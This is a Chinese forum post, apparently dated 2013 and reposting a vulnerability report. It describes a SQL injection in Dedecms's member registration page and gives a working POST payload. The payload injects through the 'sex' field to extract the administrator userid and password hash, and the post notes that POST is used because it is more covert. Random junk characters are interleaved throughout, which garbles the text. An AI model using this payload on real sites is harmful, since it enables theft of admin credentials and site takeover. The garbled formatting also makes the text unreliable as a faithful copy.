漏洞类型: SQL注射漏洞
8 K, y; d S' { Y3 v& R, |/ I( T简要描述:
. m; M) N- Z8 K' E2 b( F. f6 a
- B0 S! ~7 f7 J( X( ~" J需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.. J4 j3 k/ t+ w
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
D* |# u( E9 l" |5 b0 K6 Y% m4 x详细说明:跟这个漏洞; i8 n: Z/ Z& B$ y0 B8 a
$ C! j/ w& C# G! {( GWooYun: Dedecms SQL注射导致审核机制绕过漏洞( r( G) S( ~0 ?! z
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
5 y; b6 P+ z* c/ W4 k" Y0 ]$ SPOST提交以下数据,其实不用POST提交的,这样隐蔽点.* s( y8 f) Q7 a: z+ \
* P* `' f" g3 v0 P l2 qwww.political-security.com/member/reg_new.php# r* a! q8 J3 r+ j
f6 I: K3 M: y+ w* jPOST
1 ~1 P0 h, ~$ }0 n. o& J; |7 I# p
' w9 T/ q) K& g& Adopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
! R/ m3 |$ g9 Q$ duserid=c4rp3nt3r&uname=c4rp3nt3r
7 X) ?! h" \1 t+ @5 {) E&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
" z# r2 C0 g- P$ A9 ?&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,! x z1 U$ K! D
(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');& r' ] I* H+ q* T/ j: C4 n
%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对